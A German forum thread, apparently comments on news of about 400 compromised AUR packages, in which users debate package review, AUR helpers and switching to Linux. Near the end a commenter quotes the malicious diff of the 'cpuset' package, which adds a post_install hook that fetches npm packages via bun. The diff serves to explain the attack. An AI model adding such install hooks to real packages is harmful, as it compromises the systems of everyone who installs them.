Du verwendest einen veralteten Browser. Es ist möglich, dass diese oder andere Websites nicht korrekt angezeigt werden. Du solltest ein Upgrade durchführen oder einen alternativen Browser verwenden.
NewsArch Linux unter Feuer: 400 Pakete im AUR kompromittiert
Das ist natürlich ein Problem...
aber wie verteilt es sich dann, um andere Systeme zu infizieren?
Besser wäre es doch einen Server hinzustellen und dort alle AUR Pakete zu speicher und alles andere nicht installierbar zu machen, sonst ist man ja nur noch am Suchen nach infizieren Paketen.
Es lädt von den MS Servern das Debian Package für VSC, entpackt das und installiert es.
Desktopverknüpfung gibts auch und fertig.
Das könnte man auch manuell machen, oder sich selber ein shellscript schreiben. Das AUR package macht es nur einfacher. Als Package (für mich) akzeptabel.
Das kann man lesen und verstehen. Wenn man das PKGBUILD nicht kapiert -> finger weg.
Man darf halt nicht blind jeden Mist installieren, genau wie bei Windows auch.
Wobei Windows out of the box deutlich mehr Sicherheitsmaßnahmen aktiv halt als ein nacktes Arch...
Als Windows Nutzer lese ich solche Nachrichten, versuche irgendwie zu verstehen über was geredet wird & sage dann zu mir selbst "WTF, das tust du dir niemals an".
Als Windows Nutzer lese ich solche Nachrichten, versuche irgendwie zu verstehen über was geredet wird & sage dann zu mir selbst "WTF, das tust du dir niemals an".
Alles halb so wild. Das betrifft jetzt nicht die offizielle Softwarebasis von Arch und der darauf basierenden Distris. Das AUR ist sowas wie ein Sideloadingbereich, aus dem man sich inoffizielle Programmpakete installieren kann.
Als Windows Nutzer lese ich solche Nachrichten, versuche irgendwie zu verstehen über was geredet wird & sage dann zu mir selbst "WTF, das tust du dir niemals an".
Ich nutze Windows seit Version 3. Davor war es MS-DOS. Seit einem Jahr nutze ich Fedora Silverblue & sage zu mir selbst "WTF, Warum hast du das nicht viel früher genutzt".
Linux ist nicht schwer. Man muss sich nur drauf einlassen, verstehen, dass es kein Windows ist und nicht wie Windows funktioniert.
DANN wird man mit einem System belohnt bei dem man sich morgens schon freut, es abends benutzen zu dürfen.
@~XxX~
Ich nutze Mint und bin auch wirklich sehr zufrieden. Und ja, auch ich hab mit MS-Dos (3.3) angefangen und bin über Windows 3.0, 3.1. 3.11 usw. die Windows Leiter hochgestiegen, bis ich erst bei Windows 11 die Reissleine zog und endgültig auf Linux umgestiegen bin. Obwohl ich in diesen ganzen Jahrzehnten Linux immer wieder auch im Dualboot auf dem Rechner hatte, aber trotzdem nie den Umzug in Kauf nahm.
Keine Ahnung warum. Ich habe auch Unmengen von Distributionen probiert und bin immer wieder gestolpert... weil ich es eben versucht habe wie Windows zu benutzen. Das Konzept der atomaren Desktops hat mich dann so geflashed, dass ich wochenlang nur Beiträge dazu verschlungen habe. So ist der Knoten geplatzt
@~XxX~
Ich hatte von Windows 11 einfach irgendwann die Nase voll und hab überlegt auf Linux umzusteigen. So ne Woche ging das. Dann hab ich mir Live Distris angesehen, eine Vorauswahl getroffen und die dann gezielt etwas genauer getestet. Nach zwei Tagen blieb davon nur noch Mint Cinnamon übrig, weil mich das total abgeholt hatte, das wurde dann im Dualboot auf die freigeräumte SATA SSD installiert und ausgiebig getestet. Zwei Wochen danach gabs Windows 11 bei mir nur noch als VHD, die auf meiner Sicherungsplatte verkümmert und Mint ist seit seiner dann erfolgten Neuinstallation auf die NVME das primäre OS auf dem Rechner. Gelegentlich installiere ich noch andere Distris auf die SATA SSD, um die zu testen, hab aber bisher nix gefunden, das mich so abholt wie Mint.
eigentlich gibt jeder Helper fuer Aur den Hinweis das man sich die Pkgbuild angucken soll, stoppt kurz und fragt nach, bevor die eigentliche Installation beginnt.
ja es macht durch aus Sinn auch als Neuling Aur zu verwenden denn hier sind leider viel zu oft die Druckertreiber drin
Unter den korrumpierten Paketen findet sich wohl auch (u.a.) Nextcloud, wer das (aus dem AUR) nutzt sollte wohl mal ein paar Tage AUR-Updates aussetzen....
Nun ja, immerhin werden im AUR solche Dinge wenigstens noch entdeckt - bei den ganzen im Netz kursierenden App-Images kontrolliert niemand, die unterliegen gar keinen Überprüfungen.
@xcsvxangelx weil das nicht immer so war, genauso das sich discord selbst updatet ohne repo bzw aus der repo. Das haben die auch geandert,
vermutlich wird es auch so bei Nextcloud sein
Was soll denn die alternative sein Virenverseuchet setup.msi runter laden? Repositories sind natürilch sicher als von wilden Webseiten einzelne Installer runter zu laden.
Auch hier die Zahl hört sich schlimm an aber wurde ja schon aufgedrösselt das A schnell entdeckt also musste man zeitlich sehr viel pech haben genau da was installiert haben und die ungefragtesten Pakete (Orphaned) betroffen also die Chance auch als AUR Nutzer der die PKGFiles nicht liest betroffen zu sein ist extrem gering.
Ach in Arch gab es seit Jahr und Tag AUR helper wie yaourt, yay und paru, die immer schon sehr verbreitet waren und womit es sich die Leute leicht gemacht haben. Dafür brauchts kein Manjaro oder Cachy. Diesen Profi Anstrich halte ich für ein altes Märchen. Auch der Profi findet alles immer manuell bis ins kleinste Detail zu prüfen lästig. Wenn die These stimmen würde, dürfte ja kein Arch User betroffen sein oder meinetwegen nur Neulinge, weil die Profis das ja alle direkt gemerkt haben. Das wage ich dann doch zu bezweifeln. Selbst ohne AUR Helper.
Um diese Helper zu installieren musstest du aber auch erst einmal ins Wiki und zumindest einmal die AUR-Seite durchlesen um das Paket manuell zu klonen, bauen und installieren. Erst danach kannst du die Helper auch nutzen. Außerdem zeigt dir normalerweise jeder Helper die PKGBUILD und Install Files an, wenn du ein AUR-Paket installierst. Wenn es bereits in einer älteren Version installiert wurde, zeigt es einen Diff an.
Gerade bei den Diffs fallen solche Sachen normalerweise sofort auf. Wozu braucht das Paket plötzlich npm? Dann noch ein komisches Post Install Script, das irgendwelche npm Packages nachinstalliert. Da sollte man schon erst einmal gucken, was da genau passiert, bevor man die Änderungen akzeptiert. Generell sollte man jeden Change der mehr als die Versionsnummer und Checksum betrifft überprüfen. Und ja, ich mache das.
Afaik sind Cachy und Manjaro ein Problem, weil deren GUIs kein Review der PKGBUILD vorsehen. Zumindest nicht in den Defaulteinstellungen. Außerdem sind dort keinerlei AUR Kenntnisse nötig.
@blackiwid Es sind nicht nur orphaned packages betroffen. z.B. cpuset, hatte ich bis vor 1-2 Jahren sogar selbst noch installiert. Zugegeben, wurde ewig nicht aktualisiert, allerdings gibt es auch keine neuere Version. Und das wird wohl auf mehrere Pakete zutreffen.
Ergänzung ()
Übrigens hier einmal ein Diff eines betroffenen Pakets. Es wurden axios und js-digest via bun installiert. Der Artikel ist etwas outdated, da npm und Atomic-Lockfile nur am Anfang genutzt wurde.
Diff:
diff --git a/.SRCINFO b/.SRCINFO
index 053843df5e13..f472e97aa275 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -3,9 +3,11 @@ pkgbase = cpuset
pkgver = 1.6
pkgrel = 2
url = https://github.com/lpechacek/cpuset
+ install = cpuset-deps.install
arch = any
license = GPL2
makedepends = python-setuptools
+ depends = bun
depends = python
options = !emptydirs
source = cpuset-1.6.tar.gz::https://github.com/lpechacek/cpuset/archive/v1.6.tar.gz
diff --git a/PKGBUILD b/PKGBUILD
index 7a32812cbff8..5e1bb6f4d319 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -7,9 +7,10 @@ pkgdesc="Python app to make using the cpusets facilities in the Linux kernel eas
arch=(any)
url="https://github.com/lpechacek/$pkgname"
license=(GPL2)
-depends=(python)
+depends=('bun' python)
makedepends=(python-setuptools)
options=('!emptydirs')
+install=cpuset-deps.install
source=("$pkgname-$pkgver.tar.gz::$url/archive/v$pkgver.tar.gz")
b2sums=('389c274981fe9a23188da71ce0fbc1e0bcdfe6dbe0108bf45659511cbbf711022108914e16aa679c0934f9a5a06b69129738d5f85e96aeb7604cef9c840133a3')
diff --git a/cpuset-deps.install b/cpuset-deps.install
new file mode 100644
index 000000000000..4fd3eb0ead3a
--- /dev/null
+++ b/cpuset-deps.install
@@ -0,0 +1,4 @@
+post_install() {{
+ cd /tmp
+ bun add axios js-digest
+}}
